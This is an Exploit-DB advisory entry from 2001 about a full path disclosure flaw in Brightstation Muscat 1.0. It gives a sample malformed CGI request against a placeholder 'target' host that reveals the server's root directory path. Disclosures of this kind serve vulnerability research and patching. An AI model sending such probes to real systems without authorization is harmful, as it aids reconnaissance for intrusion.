Brightstation Muscat 1.0 - Full Path Disclosure

EDB-ID:

20633


Author:

cuctema

Type:

remote


Platform:

CGI

Date:

2001-02-12


source: https://www.securityfocus.com/bid/2374/info

Making an invalid request to a machine running Brightstation Muscat, will disclose the physical path to the root directory. 

http://target/cgi-bin/empower?DB=UkRteamHole
http://target/cgi-bin/empower?DB=UkRteamHole